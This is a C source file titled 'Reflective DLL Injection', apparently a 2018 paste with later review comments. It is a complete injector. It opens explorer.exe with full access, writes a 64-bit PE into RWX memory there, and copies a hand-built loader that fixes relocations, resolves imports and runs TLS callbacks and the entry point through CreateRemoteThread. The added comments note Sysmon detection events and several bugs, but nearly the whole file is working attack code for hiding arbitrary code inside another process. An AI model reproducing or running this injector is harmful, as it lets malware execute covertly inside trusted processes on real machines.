shifat627

Reflective DLL Injection

Dec 10th, 2018
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<tlhelp32.h>
  4. #include<string.h>
  5.  
  6.  
/*
 * Parameter block for AdjustPE().
 *
 * main() writes one of these into the remote allocation (Adj) and passes
 * that address as the thread argument to CreateRemoteThread, so the copied
 * AdjustPE code reads it from the target process. The layout therefore has
 * to be identical on both sides (same compiler, x64 build).
 *
 * Get_Proc / Load_DLL are filled by main() with the injector's own
 * GetProcAddress / LoadLibraryA addresses; presumably they are passed in
 * because the raw copy of AdjustPE cannot resolve imports on its own.
 * NOTE(review): those addresses are only meaningful in the target if
 * kernel32 is mapped at the same base there — not verified anywhere in
 * this file.
 */
typedef struct _PE_INFO
{
    LPVOID base;     // Remote image base returned by VirtualAllocEx in main()
    BOOL reloc; //For If base relocation is needed
    LPVOID Get_Proc; //Address OF GetProcAddress()
    LPVOID Load_DLL; //Address OF LoadLibraryA()
}PE_INFO , * LPE_INFO;
  14.  
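/*
 * Map the whole file FileName read-only into this process.
 *
 * Returns the base address of the view, or NULL on any failure (file not
 * found, empty file, mapping error). The caller owns the view; nothing in
 * this file ever unmaps it (main() keeps it for the process lifetime).
 *
 * Fix over the original: the file handle and the mapping handle were leaked
 * on every path (and the file handle also when CreateFileMappingA failed).
 * Both are closed here before returning. A mapped view holds its own
 * reference to the mapping object, so the view stays valid after both
 * handles are closed.
 */
LPVOID Read_in_Memory(char * FileName)
{
    HANDLE f, h = NULL;
    LPVOID mem = NULL;

    f = CreateFileA(FileName, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (f == INVALID_HANDLE_VALUE)
        return NULL;

    // Size 0/0 maps the entire file; CreateFileMappingA refuses a zero-length file.
    h = CreateFileMappingA(f, NULL, PAGE_READONLY, 0, 0, NULL);
    if (h != NULL)
    {
        // MapViewOfFile returns NULL on failure, which is also our error result.
        mem = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);
        CloseHandle(h);
    }

    CloseHandle(f);
    return mem;
}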
  32.  
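/*
 * Return a PROCESS_ALL_ACCESS handle to the first running process whose
 * image name is byte-equal (case-sensitive strcmp) to process_name, or NULL
 * when no such process exists or any step fails. The caller owns the
 * handle; main() never closes it.
 *
 * Fix over the original: the snapshot handle was leaked when
 * Process32First() failed. Behaviour is otherwise unchanged.
 *
 * NOTE(review): PROCESSENTRY32.szExeFile is a CHAR array only in the ANSI
 * build; with UNICODE defined it is WCHAR and this strcmp would be wrong.
 *
 * Detection note: a snapshot-based process lookup followed by OpenProcess
 * with PROCESS_ALL_ACCESS on another process is exactly the ProcessAccess
 * event (Sysmon Event ID 10) that EDR rules key on ahead of injection.
 */
HANDLE Find_Process(char * process_name)
{
    HANDLE snap, proc;
    PROCESSENTRY32 ps;
    BOOL found = 0;

    ps.dwSize = sizeof(ps);

    snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE)
        return NULL;

    if (Process32First(snap, &ps))
    {
        do
        {
            if (!strcmp(process_name, ps.szExeFile))
            {
                found = 1;   // ps now holds the matching entry
                break;
            }
        } while (Process32Next(snap, &ps));
    }

    // The snapshot is only needed for enumeration; release it on every path.
    CloseHandle(snap);
    if (!found)
        return NULL;

    // NULL on failure (e.g. insufficient privilege), exactly as before.
    proc = OpenProcess(PROCESS_ALL_ACCESS, 0, ps.th32ProcessID);
    return proc;
}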
  67.  
  68.  
/*
 * Remote-side loader. main() copies the raw bytes from AdjustPE up to main
 * (Func_Size) into the target process and starts a thread on them with an
 * LPE_INFO as the argument, so this function executes inside the target,
 * not in the injector. That is presumably why it takes Load_DLL / Get_Proc
 * from pe rather than calling the imports directly: a raw byte copy cannot
 * use the injector's IAT or any string literal. No call to a named function
 * may be added here without breaking that.
 *
 * Steps, in order: apply DIR64 base relocations (only if pe->reloc),
 * resolve the import table, run TLS callbacks, call the entry point with
 * DLL_PROCESS_ATTACH. Data directory indices used: 5 = BASERELOC,
 * 1 = IMPORT, 9 = TLS. 64-bit images only (ULONGLONG fixups; main() rejects
 * anything that is not PE32+).
 *
 * Robustness / detection notes (documentation only, nothing changed):
 *  - Every header field (e_lfanew, SizeOfBlock, thunk RVAs, TLS pointers)
 *    is trusted without bounds checks, so a malformed image faults the
 *    host process — a crash of the target is a loud failure mode.
 *  - Load_DLL's return is not checked; on failure Get_Proc(NULL, ...) is
 *    called and the IAT slot is written as 0.
 *  - Imports are resolved through LoadLibraryA inside the target, so each
 *    dependency shows up as an image load in that process.
 *  - Nothing checks IMAGE_FILE_DLL; the entry point is always invoked with
 *    DllMain semantics and its return value is ignored.
 *  - `base + rva` on an LPVOID relies on the GCC/MinGW void* arithmetic
 *    extension (byte-sized), not standard C.
 */
void AdjustPE(LPE_INFO pe)
{
    PIMAGE_DOS_HEADER dos;
    PIMAGE_NT_HEADERS nt;
    LPVOID base;
    PIMAGE_IMPORT_DESCRIPTOR import;
    PIMAGE_THUNK_DATA Othunk,Fthunk;
    PIMAGE_BASE_RELOCATION reloc;
    PIMAGE_TLS_DIRECTORY tls;
    PIMAGE_TLS_CALLBACK * CallBack;
    ULONGLONG * p,delta;
   
    // Entry point and the two helpers are reached only via pointers (see header comment).
    BOOL (*DLL_Entry)(LPVOID , DWORD , LPVOID );
    LPVOID (*Load_DLL)(LPSTR );
    LPVOID (*Get_Proc)(LPVOID , LPSTR );
   
    base=pe->base;
    Load_DLL=pe->Load_DLL;
    Get_Proc=pe->Get_Proc;
   
    dos=(PIMAGE_DOS_HEADER)base;
    nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
   
    DLL_Entry=base+nt->OptionalHeader.AddressOfEntryPoint;
   
    // Relocation is needed only when main() could not allocate at the preferred ImageBase.
    if(!pe->reloc)
    goto Load_Import;
   
    Base_Relocation:   // label is never jumped to; kept as a section marker
        if(nt->OptionalHeader.DataDirectory[5].VirtualAddress==0) //No Relocation Table Found
        goto Load_Import;
        // Unsigned wrap-around gives the correct two's-complement delta for a lower actual base.
        delta=(ULONGLONG)base-nt->OptionalHeader.ImageBase;
        reloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[5].VirtualAddress);
        while(reloc->VirtualAddress)
        {
            LPVOID dest=base+reloc->VirtualAddress;
            // Each entry is a WORD: high 4 bits = type, low 12 bits = offset within the page.
            int nEntry=(reloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
            PWORD data=(PWORD)((LPVOID)reloc+sizeof(IMAGE_BASE_RELOCATION));
            int i;
            for(i=0;i<nEntry;i++,data++)
            {
                // 10 == IMAGE_REL_BASED_DIR64; every other type (incl. ABSOLUTE padding) is skipped.
                if(((*data)>>12)==10)
                {
                    p=(PULONGLONG)(dest+((*data)&0xfff));
                    *p+=delta;
                }
            }
           
            // SizeOfBlock is trusted; a zero value here would loop forever.
            reloc=(PIMAGE_BASE_RELOCATION)((LPVOID)reloc+reloc->SizeOfBlock);
           
        }
        //End OF base Relocation
       
    Load_Import:
        if(nt->OptionalHeader.DataDirectory[1].VirtualAddress==0)
        goto TLS_CallBack;
        import=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[1].VirtualAddress);
        while(import->Name)
        {
            LPVOID dll=(*Load_DLL)(base+import->Name);   // return value not checked
            Othunk=(PIMAGE_THUNK_DATA)(base+import->OriginalFirstThunk);
            Fthunk=(PIMAGE_THUNK_DATA)(base+import->FirstThunk);
           
            // No ILT: the IAT itself still holds the unresolved names/ordinals.
            if(!import->OriginalFirstThunk)
            Othunk=Fthunk;
           
            while(Othunk->u1.AddressOfData)
            {
                if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
                {
                    // Ordinal import: GetProcAddress accepts the ordinal in the low word of the name pointer.
                    *(ULONGLONG *)Fthunk=(ULONGLONG)(*Get_Proc)(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
                }
                else
                {
                    PIMAGE_IMPORT_BY_NAME fnm=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
                    *(PULONGLONG)Fthunk=(ULONGLONG)(*Get_Proc)(dll,fnm->Name);
                }
                Othunk++;
                Fthunk++;
            }
            import++;
        }
   
   
    TLS_CallBack:
        if(nt->OptionalHeader.DataDirectory[9].VirtualAddress==0)
        goto Execute_Entry;
        tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[9].VirtualAddress);
        if(tls->AddressOfCallBacks==0)
        goto Execute_Entry;
       
        // AddressOfCallBacks is an absolute VA (not an RVA), hence no `base +`; when
        // pe->reloc was set it has already been fixed up by the relocation pass above.
        CallBack=(PIMAGE_TLS_CALLBACK *)(tls->AddressOfCallBacks);
        while(*CallBack)
        {
            (*CallBack)(base,DLL_PROCESS_ATTACH,NULL);
            CallBack++;
        }
   
   
    Execute_Entry: 
        // DllMain-style call; the BOOL result is discarded.
        (*DLL_Entry)(base,DLL_PROCESS_ATTACH,NULL);
   
}
  172.  
  173.  
/*
 * Injector entry point. Usage: <program> <pe>
 *
 * Flow: map the PE from disk (Read_in_Memory) -> check the MZ and PE32+
 * magic values -> open a handle to the hard-coded target (Find_Process)
 * -> VirtualAllocEx an RWX region of SizeOfImage in the target, first at
 * the preferred ImageBase and otherwise anywhere (setting pe.reloc) ->
 * WriteProcessMemory the headers and each section -> allocate a second
 * RWX region holding a PE_INFO followed by the raw bytes of AdjustPE ->
 * CreateRemoteThread on that copy with the PE_INFO address as argument.
 *
 * Detection notes: VirtualAllocEx(PAGE_EXECUTE_READWRITE) +
 * WriteProcessMemory + CreateRemoteThread into another process is the
 * textbook remote-thread injection chain (Sysmon Event ID 8 for the remote
 * thread, Event ID 10 for the PROCESS_ALL_ACCESS open). The image is not
 * file-backed in the target, so it ends up as private, executable RWX
 * memory of the kind memory scanners flag.
 *
 * Issues left in place (documentation only): argc is named `i` and reused
 * as the section loop counter; every WriteProcessMemory result is ignored;
 * section PointerToRawData/SizeOfRawData are trusted without checking them
 * against the file or SizeOfImage; `%#p` is handed a ULONGLONG, which is a
 * format/argument mismatch; Func_Size assumes main() is laid out directly
 * after AdjustPE with nothing in between (compiler/optimizer dependent);
 * the mapped view, the process handle and the remote allocations are never
 * released on the success path; and every error path returns 0, so the exit
 * code cannot signal failure.
 */
int main(int i,char **arg)
{
    if(i!=2)
    {
        printf("Usage %s <pe>",*arg);
        return 0;
    }
   
    HANDLE proc;
    LPVOID base,Rbase,Adj;
    PIMAGE_DOS_HEADER dos;
    PIMAGE_SECTION_HEADER sec;
    PIMAGE_NT_HEADERS nt;
    DWORD Func_Size;
    PE_INFO pe;
   
    printf("[+]Opening File...\n");
   
    if((base=Read_in_Memory(*(arg+1)))==NULL)
    {
        printf("[-]File I/O Error");
        return 0;
    }
   
    dos=(PIMAGE_DOS_HEADER)base;
   
    // 23117 == 0x5A4D == "MZ" (IMAGE_DOS_SIGNATURE). e_lfanew itself is not range-checked.
    if(dos->e_magic!=23117)
    {
        printf("[-]Invalid File");
        return 0;
    }
   
    nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
    // 24 == offset of OptionalHeader (4-byte Signature + 20-byte FILE_HEADER); sections follow the optional header.
    sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+24+nt->FileHeader.SizeOfOptionalHeader);
   
    // PE32+ only; PIMAGE_NT_HEADERS is the 64-bit layout only in an x64 build of this injector.
    if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
    {
        printf("[-]This is not 64 bit pe");
        return 0;
    }
   
    printf("\n[+]Open Process.....");
   
    if((proc=Find_Process("explorer.exe"))==NULL)
    {
        printf("[-]Failed To Open Process");
        return 0;
    }
   
    printf("[+]Allocating Memory Into Remote Process");
   
    pe.reloc=0;
   
    // First try the preferred base so no relocation is needed; RWX for the whole image.
    if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
    {
        // NOTE(review): %#p with a ULONGLONG argument is a printf type mismatch.
        printf("\n[!]Failed To Allocate Memory AT %#p\n[!]Trying Alternative\n",nt->OptionalHeader.ImageBase);
        pe.reloc=1;
        if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
        {
            printf("[-]Failed To Allocate Memory Into Remote Process");
            return 0;
        }
    }
   
    printf("\n[+]Copying Headers");
    WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
    printf("\n[+]Copying Sections...");
    // `i` (argc) is reused here as the loop index.
    for(i=0;i<nt->FileHeader.NumberOfSections;i++)
    {
        // Raw file bytes go to the section's virtual address; no bounds check on either side.
        WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
        sec++;
    }
   
    // Size of AdjustPE is taken as the distance to the next function in the binary —
    // valid only if the compiler emits main() immediately after AdjustPE().
    Func_Size=(DWORD)((ULONGLONG)main-(ULONGLONG)AdjustPE);
    pe.base=Rbase;
    // Injector-local addresses; presumably assumed to match the target's kernel32 mapping.
    pe.Get_Proc=GetProcAddress;
    pe.Load_DLL=LoadLibraryA;
   
    if((Adj=VirtualAllocEx(proc,NULL,Func_Size+sizeof(pe),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
    {
        printf("\n[-]Failed To Allocate Memory for PE adjusting");
        VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
        return 0;
    }
   
    // Layout at Adj: [PE_INFO][AdjustPE code]; the thread starts on the code and receives Adj as its parameter.
    WriteProcessMemory(proc,Adj,&pe,sizeof(pe),NULL);
    WriteProcessMemory(proc,Adj+sizeof(pe),AdjustPE,Func_Size,NULL);
    if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)(Adj+sizeof(pe)),Adj,0,NULL))
    printf("\n[-]Failed TO Adjust PE");
    else
    printf("\n[+]Adjusting PE And Executing....");
   
    // proc, the mapped view and both remote allocations are intentionally left alive here.
    return 0;
   
}